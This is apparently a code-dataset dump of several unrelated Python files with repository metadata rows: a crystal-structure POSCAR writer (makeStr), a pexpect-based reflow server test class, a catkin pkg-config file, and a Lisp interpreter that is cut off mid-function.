aBas[iAt] = array([i if i < (1.0-eps) else i-1.0 for i in aBas[iAt]])
aBas[iAt] = array([i if i >= (0.0-eps) else i+1.0 for i in aBas[iAt]])
return aBas
def _map_enumStr_to_real_space(system_data,structure_data,minkowskiReduce):
"""Maps an enumerated structure back to real space. Returns a
dictionary containing the real space data.
:arg system_data: a dictionary containing all the information about the sysytem.
:arg sturture_data: a dictionary containing the information for this structure.
:arg minkowskiReduce: logical indicating if basis should be reduced.
"""
from numpy import matmul, allclose, matrix, array
nD = system_data["nD"]
n = structure_data["n"]
# DEFINE the non-zero elements of the HNF matrix
a = structure_data["HNF"][0][0]
b = structure_data["HNF"][1][0]
c = structure_data["HNF"][1][1]
d = structure_data["HNF"][2][0]
e = structure_data["HNF"][2][1]
f = structure_data["HNF"][2][2]
pBas = system_data["dvecs"]
S = structure_data["diag"]
pLV = system_data["plattice"]
HNF = structure_data["HNF"]
eps = system_data["eps"]
L = structure_data["L"]
# Compute the superlattice vectors
sLV = matmul(pLV,HNF).tolist()
# Find the coordinates of the basis atoms
gIndx = []
if minkowskiReduce:
sLV = list(map(list,zip(*_minkowski_reduce_basis(list(map(list,zip(*sLV))),eps))))
# Find each atomic position from the g-space information
aBas = []
ic = 0 # Keep track of the number of points mapped so far
# Loop over the number at sites/parent cell (the d set)it
for iD in range(0, nD):
# For the limits on the loops, see the "interior_points.pdf" write-up
for z1 in range(a):
for z2 in range(int((b*z1)/a), int(c+(b*z1)/a)):
for z3 in range(int(z1*(d-(e*b)/c)/a+(e*z2)/c), int(f+z1*(d-(e*b)/c)/a+(e*z2)/c)):
ic +=1
# if ic > n: #pragma: no cover
# err("Problem with basis atoms in map_enpStr_to_real_space...")
# exit()
# Atomic basis vector in Cartesian coordinates
temp = matmul(pLV,[z1,z2,z3]).tolist()
temp2 = [temp[i]+pBas[iD][i] for i in range(len(pBas[iD]))]
aBas.append(temp2)
# Map position into the group
greal = matmul(L,[float(z1),float(z2),float(z3)]).tolist()
g = [int(i) for i in greal] # Convert the g-vector from real to integer
if not allclose(greal,g,rtol=eps,atol=eps): #pragma: no cover
err("map2G didn't work in map_enumStr_to_real_space")
exit()
# Bring the g-vector back into the first tile
g = [g[i]%S[i] for i in range(len(S))]
# gIndx is the index in the configuration string that
# tells us which atom type is used at this position
gIndx.append((iD)*S[0]*S[1]*S[2]+g[0]*S[1]*S[2]+g[1]*S[2]+g[2])
if ic != n*nD: #pragma: no cover
err("ERROR: map_enumStr_to_real_space: Didn't find the correct # of basis atoms")
exit()
k = system_data["k"]
x = []
for i in range(k):
x.append(0.0)
labeling = structure_data["labeling"]
spin = []
if k % 2 == 0:
for iAt in range(0, n*nD):
i = int(labeling[gIndx[iAt]])
digit = i-k//2 # convert 0..k-1 label to spin variable -k/2..k/2
x[i] += 1 # Keep track of the concentration of each atom type
if digit < 0:
spin.append(digit)
else:
spin.append(digit+1) # skip 0 as a spin if k is even
else:
for iAt in range(0, n*nD):
i = int(labeling[gIndx[iAt]])
spin.append(i-k//2)
x[i] += 1 # Keep track of the concentration of each atom type
x = [i/float(n*nD) for i in x]
space_data = {"sLV": list(map(list,zip(*sLV))), "aBas": aBas, "spin": spin, "gIndx": gIndx, "x": x}
return space_data
def _minkowski_reduce_basis(IN,eps):
"""Performs a minkowski reduction on the basis atoms."""
from numpy import allclose, linalg, array, matrix
from copy import deepcopy
limit = 10
if allclose(linalg.det(IN),0.0,rtol=eps,atol=eps):
raise ValueError("Input basis for 'minkowski_reduce_basis' was not linearly independent")
OUT = deepcopy(IN)
# Keep applying the greedy algorithm until the vectors come out already sorted
for it in range(1, limit +1):
# Sort the three vectors into ascending order
temp = deepcopy(OUT)
norms = linalg.norm(temp,axis=1).tolist()
tt = list(range(3))
tt.reverse()
for i in tt:
idx = norms.index(max(norms))
temp[i] = OUT[idx]
norms[idx] = 0
OUT = deepcopy(temp) # Copy the sorted vectors back to OUT
(OUT[0], OUT[1], OUT[2]) = _reduce_C_in_ABC(OUT[0],OUT[1],OUT[2],eps)
if linalg.norm(OUT[2]) >= (linalg.norm(OUT[1])-eps):
break
if not _minkowski_conditions_check(OUT,eps): #pragma: no cover
err("ERROR in minkowski_reduce_basis: Minkowski conditions not met."
"Number of iterations: {}".format(str(limit)))
exit()
# we want to make sure that the det is positive.
# NOTE: This *destroys* the mathematical picture of a "greedy reduced basis" (Minkowski), but
# from a physical point of view we don't care ;-)
# Either way, the basis is as orthogonal as possible.
if linalg.det(OUT) < 0:
temp[0] = OUT[1]
OUT[1] = OUT[2]
OUT[2] = temp[0]
return OUT
def _read_enum_out(args):
"""Reads the struct_enum.out file and builds a dictionary with the needed
information to construct a POSCAR.
:arg args: The makeStr.py input arguments
"""
from numpy import transpose
# which structures are wanted
if args["structures"] == None:
with open(args["input"],"r") as f:
for count, l in enumerate(f):
pass
structures = list(range(1,count-13))
else:
structures = args["structures"]
# open the enum.out style file.
structf = open(args["input"],"r")
# we'll build a dictionary of the system data and a list of
# dictionaries for the structures that are wanted.
structure_data = []
system = {}
system["plattice"] = []
system["dvecs"] = []
line_count = 1
system["nD"] = 0
for line in structf:
temp = line.rstrip()
if not temp.startswith("#") and "#" not in temp.split()[0]:
if line_count == 1:
system["title"] = temp
if line_count == 2:
system["bulksurf"] = temp
if line_count in [3,4,5]:
vec = [float(v) for v in temp.split() if RepresentsFloat(v)]
system["plattice"].append(vec)
if line_count == 6:
system["nD"] = int(temp.rstrip().split()[0])
if system["nD"] != 0 and line_count in range(7,7+system["nD"]):
vec = [float(v) for v in temp.split() if RepresentsFloat(v)]
system["dvecs"].append(vec)
if line_count == 7+system["nD"]:
system["k"] = int(temp.split('-')[0].strip())
if line_count == 9 + system["nD"]:
system["eps"] = float(temp.strip().split()[0])
if line_count - (14 + system["nD"]) in structures:
data = temp.split()
this_struct = {}
this_struct["strN"] = int(data[0])
this_struct["hnfN"] = int(data[1])
this_struct["hnf_degen"] = int(data[2])
this_struct["lab_degen"] = int(data[3])
this_struct["tot_degen"] = int(data[4])
this_struct["sizeN"] = int(data[5])
this_struct["n"] = int(data[6])
this_struct["pgOps"] = int(data[7])
this_struct["diag"] = [int(data[8]),int(data[9]),int(data[10])]
this_struct["HNF"] = [[int(data[11]),0,0],[int(data[12]),int(data[13]),0],
[int(data[14]),int(data[15]),int(data[16])]]
this_struct["L"] = [[int(data[17]),int(data[18]),int(data[19])],
[int(data[20]),int(data[21]),int(data[22])],
[int(data[23]),int(data[24]),int(data[25])]]
this_struct["labeling"] = data[26]
if len(data) == 28:
this_struct["directions"] = data[27]
else:
this_struct["directions"] = '0'*len(this_struct["labeling"])
structure_data.append(this_struct)
line_count += 1
system["plattice"] = transpose(system["plattice"])
return (system, structure_data)
def _write_POSCAR(system_data,space_data,structure_data,args):
"""Writes a vasp POSCAR style file for the input structure and system
data.
:arg system_data: a dictionary of the system_data
:arg space_data: a dictionary containing the spacial data
:arg structure_data: a dictionary of the data for this structure
:arg args: Dictionary of user supplied input.
"""
from numpy import array
from random import uniform
# Get the output file name.
if "{}" in args["outfile"]:
filename = args["outfile"].format(str(structure_data["strN"]))
else:
filename = args["outfile"] + ".{}".format(str(structure_data["strN"]))
# Get the labeling, group index, structure number and arrow labels
# from the input data structure.
labeling = structure_data["labeling"]
gIndx = space_data["gIndx"]
arrows = structure_data["directions"]
struct_n = structure_data["strN"]
# The arrow basis.
arrow_directions = [[1,0,0],[-1,0,0],[0,1,0],[0,-1,0],[0,0,1],[0,0,-1]]
directions = []
# Construct the concentrations of the atoms from the labeling by
# counting the number of each type of atom present in the
# labeling.
concs = []
for i in range(system_data["k"]):
this_conc = 0
for atom in range(structure_data["n"]*system_data["nD"]):
if labeling[gIndx[atom]] == str(i):
this_conc += 1
concs.append(this_conc)
def_title = "{} str #: {}\n".format(str(system_data["title"]),str(structure_data["strN"]))
# Get the lattice parameter for the atomic species provided by the
# user.
lattice_parameter, title = _get_lattice_parameter(args["species"],concs,def_title)
# Find out the directions for each arrow.
for arrow in arrows:
directions.append(array(arrow_directions[int(arrow)]))
sLV = space_data["sLV"]
# Start writing the data to the file.
with open(filename,"w+") as poscar:
# First write the title and the lattice parameter.
poscar.write(title)
poscar.write("{0:.2f}\n".format(lattice_parameter))
# Then write out the lattice vectors.
for i in range(3):
poscar.write(" {}\n".format(" ".join(
["{0: .8f}".format(j) for j in sLV[i]])))
poscar.write(" ")
# Write the concentrations to the output file. If no species
# were passed in by the user then we want to write all the
# elements concentrations to the file including the
# zeros. Otherwise we can exclude the zero concentration
# elements from the list so that the file is ready to use out
# of VASP.
if args["species"] == None:
for ic in concs:
poscar.write("{} ".format(str(ic)))
else:
for ic in concs:
if ic != 0:
poscar.write("{} ".format(str(ic)))
poscar.write("\n")
poscar.write("D\n")
# Now write out the atomic positions to the file.
for ilab in range(system_data["k"]):
for iAt in range(structure_data["n"]*system_data["nD"]):
rattle = uniform(-args["rattle"],args["rattle"])
displace = directions[iAt]*args["displace"]*lattice_parameter
# If the displacement is non zero and we're `rattling`
# the system then we need to modify the displacement
# by the amount being rattled.
displace += displace*rattle
if labeling[gIndx[iAt]] == str(ilab):
# The final atomic position is the position from
# the basis plus the total displacement.
out_array = array(space_data["aBas"][iAt]) + displace
poscar.write(" {}\n".format(
" ".join(["{0: .8f}".format(i) for i in out_array.tolist()])))
def _make_structures(args):
    """Write a VASP-style POSCAR file for every requested structure."""
    system, structures = _read_enum_out(args)
    for struct in structures:
        # Map the enumerated string representation of this structure onto
        # real-space lattice vectors and an atomic basis.
        space = _map_enumStr_to_real_space(system, struct, args["mink"])
        # Convert the atomic basis from cartesian to direct coordinates
        # before writing it out.
        space["aBas"] = _cartesian2direct(space["sLV"], space["aBas"], system["eps"])
        _write_POSCAR(system, space, struct, args)
def examples():
    """Print some examples on how to use this python version of the code."""
    # Short description of the script shown at the top of the examples page.
    script = "makeStr: Makes a vasp style POSCAR for the desired system."
    explain = ("For all the examples bellow it is assumed you have already "
             "run the enumeration code and produced an struct_enum.out style file.")
    # Each entry is a (title, description, example-command) tuple rendered by
    # the shared `example` helper.
    contents = [("Make a single POSCAR file",
             "To make a POSCAR file for a specific structure listed in the "
             "`struct_enum.out` style file you will need to identify the structure \n number "
             "(the first number of each row in the file) for the structure you want "
             ". For example to make a POSCAR for structure number 10 \n from an `struct_enum.out` "
             "file.","makeStr.py 10 \n"),
            ("Make multilpe POSCARS at once",
             "To make multiple POSCARS for a range of values in the `struct_enum.out` style "
             "file simply list the starting and ending structure numbers \n of the range. "
             "To make POSCARS for every structure in the output file use the word `all`.",
             "makeStr.py 10 20 \n makeStr.py all \n"),
            ("Find the lattice parameter for the system",
             "To have makeStr.py predict the lattice parameter for the system using "
             "Vegard's Law use the -species option followed by a space \n separated list "
             "of the elements in the system.","makeStr.py 10 -species Al Cu \n"),
            ("Include displacements in POSCAR",
             "If `arrows` (displacement directions) were included in the enumeration "
             "then it is possible to displace them off the lattice points \n when making the "
             "POSCARS using the -displace option followed by the displacement amount "
             "expressed in terms of the lattice parameter. \n In other words if `a` is "
             "the lattice parameter and the atoms were to be displaced by `a/2` then "
             "the command would be:","makeStr.py 10 -displace 0.5 \n"),
            ("Make displacements have different lengths in POSCAR",
             "If `arrows` were included in the model and the `-displace` flag is being "
             "used it is possible to 'rattle' the displacements so that \n they are not all "
             "the same length. Using the `-rattle` option applies a random distribution "
             "to the displacements with the larges change \n in the displacements specified "
             "by the user as a fraction of the displacement given. So if a displacement of "
             "0.5 was given and the \n displacements were to be randomized by 1/4 of that total "
             "displacement the the command would be:",
             "makeStr.py 10 -displace 0.5 -rattle 0.25")]
    # Declared inputs/outputs for the help page; details/outputfmt are unused
    # here but required by the `example` helper's signature.
    required = ("REQUIRED: A `struct_enum.out` file.")
    output = ("RETURNS: A vasp style POSCAR labeled vasp.* where the `*` is replaced "
              "with the structure number for the `struct_enum.out` file.")
    details = ("")
    outputfmt = ("")
    example(script, explain, contents, required, output, outputfmt, details)
# Command-line options registered on the parser by _parser_options(); each
# value is the keyword-argument dict handed to add_argument().
script_options = {
    "structures": dict(nargs="+",
                       help=("The desired structure numbers from the struct_enum.out file. This "
                             "can be either a single value or a desired range indicated by "
                             "the starting and stopping structure numbers.")),
    "-displace": dict(default=0.0, type=float,
                      help=("The displacement amount for the arrows in units of the lattice "
                            "parameter. Default is 0.")),
    "-input": dict(default="struct_enum.out",type=str,
                   help=("Override the default 'struct_enum.out' file name.")),
    "-mink": dict(default="t", choices=["t","f"],
                  help=("Sets flag to perform minkowski reduction of the basis (T/F)."
                        " Default is True.")),
    "-species": dict(default=None, nargs="+",type=str,
                     help=("Specify the atomic species present in the system.")),
    "-outfile": dict(default="vasp.{}",type=str,
                     help=("Override the default output file names: 'vasp.{structure#}'"
                           "for the structures.")),
    "-rattle": dict(default=0.0, type=float,
                    help=("Randomizes the positions of the atoms in the POSCAR by no "
                          "more than the fraction of the displacement provided."))
    }
"""dict: default command-line arguments and their
:meth:`argparse.ArgumentParser.add_argument` keyword arguments.
"""
def _parser_options():
    """Parse the command-line options and return the resulting namespace."""
    import argparse

    parser = argparse.ArgumentParser(parents=[bparser],
                                     description="POSCAR contstruction.")
    # Register every option declared in the module-level `script_options`.
    for name, keywords in script_options.items():
        parser.add_argument(name, **keywords)

    # `exhandler` returns None when only examples/help were requested.
    return exhandler(examples, parser)  #pragma: no cover
def run(args):
    """Generates the vasp output file for the desired structure.

    `args["structures"]` may be a single structure number, a two-element
    [first, last] range, or the word "all" (meaning every structure in the
    input file, signalled downstream by setting it to None).

    Raises:
        ValueError: if "structures" is missing or not in one of the three
            accepted forms.
    """
    if args is None:
        exit()
    structures = args["structures"]
    # One shared message for both malformed-input branches.
    usage_msg = ("Please enter a single structure number, two structures that "
                 "indicate the first and last structure to be used in the input "
                 "file, or all. The values {} don't match this "
                 "format.".format(structures))
    if structures is None:
        raise ValueError(usage_msg)
    if not RepresentsInt(structures[0]) and structures[0].lower() == "all":
        # "all": downstream code interprets None as "every structure".
        args["structures"] = None
    elif len(structures) == 1 and RepresentsInt(structures[0]):
        args["structures"] = [int(structures[0])]
    elif len(structures) == 2:
        args["structures"] = list(range(int(structures[0]),
                                        int(structures[1])+1))
    else:
        raise ValueError(usage_msg)
    _make_structures(args)
# Entry point when executed as a script: parse options, build POSCAR files.
if __name__ == '__main__':
    run(_parser_options())
| [
"wiley.s.morgan@gmail.com"
] | wiley.s.morgan@gmail.com |
4421fe3ac2588394e9b7db0d0787a3510f2dcc4d | b9677cd37d6f0ea93c44177795a7b8a072457260 | /lib/libreflow/reflow.py | ba74c3e38e176bc54914181bec3f879bd7947838 | [] | no_license | harrytan007/TestStation | c691ee86428070ffa929e4cc2580b85a72536969 | 56bd2eb3dd6062fcf2ed263c7d7029478c5aeed5 | refs/heads/master | 2016-09-03T00:38:22.367800 | 2014-07-30T08:30:11 | 2014-07-30T08:31:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,591 | py | #coding=utf-8
#
# Copyright (C) 2013-2014 Harry Tan <tanhy@sugon.com>
#
# This file is part of libserv.
import pexpect
import re
import string
from test_station.libserv.serv import Serv
from test_station.err import EXCEPTION
from test_station.logging.logger import log
from test_station.resource import Resource
from test_station import gl
class Reflow(Serv, Resource):
    """A remote packet-reflow server driven over an interactive shell session.

    Two backends are supported, selected by the config node's <type> element:
    "vb" (controlled via /usr/local/sbin/reflow_tool) and "netfirm"
    (controlled via a reflow_rule binary under the configured directory).
    """
    def __init__(self, node):
        Serv.__init__(self, None, None)
        Resource.__init__(self, node.get("name"), "reflow")
        self.connect = []
        self.__parse(node)

    def __parse(self, node):
        """Read connection and interface settings from the XML config node."""
        self.type = node.findtext("type")
        self.ip = node.findtext("ip")
        self.password = node.findtext("passwd")
        self.dir = node.findtext("dir")
        self.if_ip = node.findtext("if_ip")
        self.if_mac = node.findtext("if_mac")
        self.if_name = node.findtext("if_name")
        self.if_port = node.findtext("if_port")

    def login(self):
        """Log in to the reflow host (delegates to Serv.remoteLogin)."""
        self.remoteLogin()

    def __vbReflowGet(self, keyword):
        """Query the "vb" backend's counters via `reflow_tool -p`."""
        ss = self.child
        ss.sendline('/usr/local/sbin/reflow_tool -p')
        ss.expect('/usr/local/sbin/reflow_tool -p(.*?)packets recv:(.*?)#', 10)
        m = re.match(r".*packets recv\:(\d+)\s+reflow\:(\d+)", ss.after.replace('\r\n', ''))
        # BUG FIX: these comparisons used `keyword is 'recv'` (identity, not
        # equality) which only works by accident of CPython string interning.
        if keyword == 'recv':
            ret = string.atoi(m.group(1))
        elif keyword == 'send':
            ret = string.atoi(m.group(2))
        return ret

    def __netfirmReflowGet(self, keyword):
        """Query the "netfirm" backend's counters via `reflow_rule find`."""
        ss = self.child
        ss.sendline("%s/reflow_rule find %s"%(self.dir.rstrip("/"), self.if_ip))
        index = ss.expect(["recv:<(.*?)> reflow:<(.*?)>", r"find %s\r\n\x1b]0;root@localhost:~\x07"%self.if_ip], 5)
        if index == 0:
            m = re.match(r".*recv\:\<(\d+)\>\s+reflow\:\<(\d+)\>", ss.after.replace('\r\n', ''))
            # BUG FIX: `is` replaced with `==` (see __vbReflowGet).
            if keyword == "recv":
                ret = string.atoi(m.group(1))
            elif keyword == "send":
                ret = string.atoi(m.group(2))
        elif index == 1:
            # No rule exists for this interface: report zero packets.
            ret = 0
        return ret

    def reflowGet(self, keyword):
        """Return a reflow counter from the server.

        keyword: "recv" (number of packets received) or "send" (number of
        packets reflowed back).  Returns the packet count as an int.
        """
        try:
            if keyword in ["recv", "send"]:
                if self.type == "vb":
                    ret = self.__vbReflowGet(keyword)
                elif self.type == "netfirm":
                    ret = self.__netfirmReflowGet(keyword)
                # NOTE(review): an unknown self.type leaves `ret` unbound and
                # raises NameError here -- confirm config always sets a valid type.
                log(0, "Get %s counts of reflow server(%s): %d" % (keyword, self.if_ip, ret))
                return ret
            else:
                log(2, "Unmatched keyword of getting reflow")
                raise EXCEPTION(1, "Get reflow counts: unmatched keyword of getting reflow")
        except pexpect.TIMEOUT:
            log(2, "Get %s counts of reflow server(%s): time out" % (keyword, self.if_ip))
            raise EXCEPTION(2, "Get %s counts of reflow server(%s): time out" % (keyword, self.if_ip))

    def __vbReflowClear(self):
        """Reset the "vb" backend's counters via `reflow_tool -c`."""
        ss = self.child
        ss.sendline('/usr/local/sbin/reflow_tool -c')
        ss.expect('/usr/local/sbin/reflow_tool -c\r\n(.*?)', 5)

    def __netfirmReflowClear(self):
        """Reset the "netfirm" backend's counters for this interface."""
        ss = self.child
        ss.sendline("%s/reflow_rule clear %s"%(self.dir.rstrip("/"), self.if_ip))
        ss.expect("#", 5)

    def reflowClear(self):
        """Reset the reflow counters on the server."""
        try:
            if self.type == "vb":
                self.__vbReflowClear()
            elif self.type == "netfirm":
                self.__netfirmReflowClear()
            log(0, "Clear reflow(%s) counts"%self.if_ip)
        except pexpect.TIMEOUT:
            log(2, "Clear reflow(%s) counts: time out"%self.if_ip)
            raise EXCEPTION(2, "Clear reflow(%s) counts: time out"%self.if_ip)

    def setIfState(self, state):
        """Bring the test interface "up" or "down" (netfirm backend only)."""
        ss = self.child
        action = {"up":"add", "down":"del"}
        try:
            if state in ["up", "down"]:
                if self.type == "netfirm":
                    ss.sendline("%s/reflow_rule %s \"%s;%s;%s;\""%(self.dir.rstrip("/"), action[state], self.if_ip, self.if_mac, self.if_port))
                    ss.expect("#", 5)
                log(0, "Set interface(%s) state: %s"%(self.if_ip, state))
            else:
                log(2, "Unmatched state of setting interface state")
                raise EXCEPTION(1, "Unmatched state of setting interface state")
        except pexpect.TIMEOUT:
            log(2, "Set interface(%s) state: time out"%self.if_ip)
            raise EXCEPTION(2, "Set interface(%s) state: time out"%self.if_ip)
| [
"harrytan007@163.com"
] | harrytan007@163.com |
ac1bf399a248cee21f69196d677399209d6ab7b1 | fa68fea5de9eeddde02d452197db592fcda1491a | /gps_cad/build/gazebo-pkgs/gazebo_test_tools/catkin_generated/pkg.develspace.context.pc.py | f456774e9270a884f35045859cc5aa970e799dd2 | [
"BSD-2-Clause"
] | permissive | iclavera/gps_cad_starts | 42763ffc4b589fa8b9865fb433173664ee75ff24 | 1375f8badbcbe2fe5f10c6f36aa104bf4ef74a2e | refs/heads/master | 2021-06-30T19:37:40.212162 | 2017-09-12T22:30:18 | 2017-09-12T22:30:18 | 103,326,745 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 707 | py | # generated from catkin/cmake/template/pkg.context.pc.in
# Devel-space pkg-config values for the gazebo_test_tools package
# (auto-generated by catkin from pkg.context.pc.in -- do not edit by hand).
CATKIN_PACKAGE_PREFIX = ""
# The `.split(';') if ... else []` pattern yields an empty list when the
# substituted CMake variable is empty.
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/melissachien/new_gps/devel/include;/home/melissachien/new_gps/src/gazebo-pkgs/gazebo_test_tools/include".split(';') if "/home/melissachien/new_gps/devel/include;/home/melissachien/new_gps/src/gazebo-pkgs/gazebo_test_tools/include" != "" else []
PROJECT_CATKIN_DEPENDS = "object_msgs;gazebo_ros;geometry_msgs;roscpp;std_msgs;message_runtime".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lgazebo_test_tools".split(';') if "-lgazebo_test_tools" != "" else []
PROJECT_NAME = "gazebo_test_tools"
PROJECT_SPACE_DIR = "/home/melissachien/new_gps/devel"
PROJECT_VERSION = "1.0.1"
"florensacc@berkeley.edu"
] | florensacc@berkeley.edu |
5b6e04be6a0f4cf577fdb163d2ff6914b318edf7 | 2cad70f628f2fa1f9829fe5349536b00b557cbb5 | /interpreter.py | 9b3ebd7d6d4612557c257e71ec7616bf5855f590 | [] | no_license | krzysztof-magosa/lisper | e34b942eb45a9f46fc44d9dcd7d3ef3991cd7205 | 34ab2829671464046137b77be59bc12ae42d1396 | refs/heads/master | 2021-01-20T08:54:21.975155 | 2017-05-08T17:07:49 | 2017-05-08T17:07:49 | 90,199,363 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,840 | py | from __future__ import print_function
from __future__ import division

import operator
import sys

import syntax
from lisp import *
def sprintf(format, *values):
    """C-style formatted string: apply the %-format string to *values*."""
    result = format % values
    return result
class Scope(object):
    """A lexical scope: a name->value table with an optional outer scope.

    Lookups walk the chain of outer scopes; definitions always land in
    this (innermost) scope.
    """
    def __init__(self, parameters=(), arguments=(), outer=None):
        # Defaults changed from mutable [] to () (never mutated, but the
        # mutable-default pattern is a known Python footgun).
        self.data = dict()
        # Bind parameters to arguments pairwise in this scope.
        self.data.update(zip(parameters, arguments))
        self.outer = outer

    def find(self, name):
        """Return the nearest scope (self or an ancestor) that defines *name*.

        Raises:
            RuntimeError: if no enclosing scope defines the variable.
        """
        if name in self.data:
            return self
        elif self.outer is None:
            raise RuntimeError(
                "Attempt to use not existing variable '{}'.".format(name)
            )
        else:
            return self.outer.find(name)

    def get(self, name):
        """Return the value of *name*, searching enclosing scopes."""
        return self.find(name).data[name]

    def define(self, name, value):
        # Creates new variable (always in this scope, shadowing outer ones).
        self.data[name] = value

    def set(self, name, value):
        # Changes existing variable or creates new variable in this scope.
        try:
            self.find(name).data[name] = value
        except RuntimeError:
            # BUG FIX: was a bare `except:` that silently swallowed *every*
            # error; only the "not defined anywhere" RuntimeError from find()
            # should fall through to define().
            self.define(name, value)
class Macro(Procedure):
    """Marker subclass of Procedure: Interpreter.eval_lisp passes a Macro its
    arguments unevaluated and then evaluates the expansion it returns."""
    pass
def scope_init(scope):
    """Populate *scope* with the interpreter's built-in global bindings."""
    # nil and t evaluate to their constant values.
    scope.define(c.NIL, c.V_NIL)
    scope.define(c.TRUE, c.V_TRUE)
    # Candidate built-ins, currently disabled:
    # scope.define('abs', abs)
    # scope.define('begin', lambda *x: x[-1])
    # scope.define('integer?', lambda x: is_integer(x))
    # scope.define('float?', lambda x: is_float(x))
    # scope.define('string?', lambda x: is_string(x))
    # scope.define('symbol?', lambda x: is_symbol(x))
    # scope.define('list?', lambda x: is_list(x))
class Interpreter(object):
    """Tree-walking evaluator for parsed lisp forms.

    Special forms and primitive operations are dispatched through the
    BUILTINS table, which maps a lisp symbol to the name of the
    `builtin_*` method that implements it.
    """
    BUILTINS = {
        'if': 'builtin_if',
        # 'eq': 'builtin_eq',
        'equal': 'builtin_equal',
        c.LAMBDA: 'builtin_lambda',
        '\\': 'builtin_lambda',
        'macro': 'builtin_macro',
        'quasiquote': 'builtin_quasiquote',
        'define': 'builtin_define',
        'set!': 'builtin_set_bang',
        'quote': 'builtin_quote',
        'print': 'builtin_print',
        'prin1': 'builtin_prin1',
        'while': 'builtin_while',
        'typeof': 'builtin_typeof',
        'format': 'builtin_format',
        'cons': 'builtin_cons',
        'null': 'builtin_is_nil',
        'join': 'builtin_join',
        'list': 'builtin_list',
        'car': 'builtin_car',
        'cdr': 'builtin_cdr',
        'len': 'builtin_len',
        'call': 'builtin_call',
        '=': 'builtin_math_eq',
        '<': 'builtin_math_lt',
        '<=': 'builtin_math_le',
        '>': 'builtin_math_gt',
        '>=': 'builtin_math_ge',
        '+': 'builtin_math_add',
        '-': 'builtin_math_sub',
        '/': 'builtin_math_div',
        '*': 'builtin_math_mul',
        'mod': 'builtin_math_mod',
        'min': 'builtin_math_min',
        'max': 'builtin_math_max',
        'begin': 'builtin_begin'
    }

    def __init__(self, parser=syntax.parser, scope_init=scope_init):
        self.parser = parser
        self.scope = Scope()
        scope_init(self.scope)

    def interpret(self, code):
        """Parse *code* and evaluate it in the interpreter's global scope."""
        lisp = self.parser.parse(code)
        return self.eval_lisp(lisp, scope=self.scope)

    def assert_nargs(self, context, args, expected):
        """Raise RuntimeError unless exactly *expected* arguments were given."""
        got = len(args)
        if got != expected:
            raise RuntimeError(
                "{}: expected {} argument(s), got {}.".format(
                    context,
                    expected,
                    got
                )
            )

    def assert_rargs(self, context, args, minimum, maximum):
        """Raise RuntimeError unless the argument count is in [minimum, maximum]."""
        got = len(args)
        if got < minimum or got > maximum:
            raise RuntimeError(
                "{}: expected {}-{} arguments, got {}.".format(
                    context,
                    minimum,
                    maximum,
                    got
                )
            )

    def assert_type(self, context, args, n, expected):
        """Raise RuntimeError unless args[n] has one of the *expected* lisp types."""
        if not isinstance(expected, list):
            expected = [expected]
        got = typeof(args[n])
        if got not in expected:
            raise RuntimeError(
                "{}: expected {} argument to be {}, got {}.".format(
                    context,
                    n,
                    "/".join(expected),
                    got
                )
            )

    def assert_type_eval(self, context, value, n, expected):
        """Like assert_type, but for an already-evaluated *value*."""
        if not isinstance(expected, list):
            expected = [expected]
        got = typeof(value)
        if got not in expected:
            raise RuntimeError(
                "{}: expected {} argument to be evaluated into {}, got {}.".format(
                    context,
                    n,
                    "/".join(expected),
                    got
                )
            )

    def builtin_cons(self, scope, args):
        """(cons head rest): prepend the evaluated head onto the list rest."""
        head = self.eval_lisp(args[0], scope)
        rest = self.eval_lisp(args[1], scope)
        if is_nil(head):
            head = []
        if is_nil(rest):
            rest = []
        if not isinstance(rest, list):
            rest = [rest]
        x = [head] + rest
        return x

    def builtin_is_nil(self, scope, args):
        """(null x): t when x evaluates to nil, nil otherwise."""
        var = self.eval_lisp(args[0], scope)
        return c.V_TRUE if is_nil(var) else c.V_NIL

    def builtin_join(self, scope, args):
        """(join l1 l2 ...): concatenate the evaluated argument lists."""
        args = [self.eval_lisp(x, scope) for x in args]
        return sum(args, [])

    def builtin_list(self, scope, args):
        """(list a b ...): list of the evaluated arguments."""
        return [self.eval_lisp(x, scope) for x in args]

    def builtin_if(self, scope, args):
        """(if test then [else]): evaluate only the selected branch."""
        self.assert_rargs("if", args, 2, 3)
        test_result = self.eval_lisp(args[0], scope)
        if is_true(test_result):
            clause = args[1]
        elif len(args) == 3:
            clause = args[2]
        else:
            clause = c.V_NIL
        return self.eval_lisp(clause, scope)

    def builtin_equal(self, scope, args):
        """(equal a b): t when the two evaluated arguments compare equal."""
        a = self.eval_lisp(args[0], scope)
        # BUG FIX: this used to re-evaluate args[0] for both operands, so
        # `equal` compared a value with itself and always returned t.
        b = self.eval_lisp(args[1], scope)
        return c.V_TRUE if a == b else c.V_NIL

    def builtin_typeof(self, scope, args):
        """(typeof x): name of the lisp type of the evaluated argument."""
        self.assert_nargs("typeof", args, 1)
        return typeof(self.eval_lisp(args[0], scope))

    def builtin_define(self, scope, args):
        """(define name value): create *name* in the current scope."""
        self.assert_nargs("define", args, 2)
        name = args[0]
        value = self.eval_lisp(args[1], scope)
        self.assert_type_eval("define", name, 0, c.T_SYMBOL)
        scope.define(name, value)

    def builtin_set_bang(self, scope, args):
        """(set! name value): rebind the nearest *name*, creating it if absent."""
        self.assert_nargs("set!", args, 2)
        name = args[0]
        value = self.eval_lisp(args[1], scope)
        self.assert_type_eval("set!", name, 0, c.T_SYMBOL)
        scope.set(name, value)

    def builtin_format(self, scope, args):
        """(format fmt a ...): %-style string formatting.

        NOTE(review): the operands are used unevaluated here, so only literal
        values work -- confirm whether they should go through eval_lisp first.
        """
        return sprintf(args[0], *args[1:])

    def builtin_quote(self, scope, args):
        """(quote x): return x unevaluated."""
        return args[0]

    def builtin_lambda(self, scope, args):
        """(lambda (params) body): build a closure over the current scope."""
        (parameters, body) = args
        return Procedure(self, parameters, body, scope)

    def builtin_macro(self, scope, args):
        """(macro (params) body): like lambda, but arguments stay unevaluated."""
        (parameters, body) = args
        return Macro(self, parameters, body, scope)

    def is_pair(self, x):
        """True for a non-empty Python list (a lisp pair)."""
        return x != [] and isinstance(x, list)

    def expand_quasiquote(self, x):
        """Rewrite a quasiquoted template into quote/cons calls, honoring unquote."""
        if not self.is_pair(x):
            return [Symbol('quote'), x]
        elif is_symbol(x[0]) and x[0] == 'unquote':
            return x[1]
        else:
            return [
                Symbol('cons'),
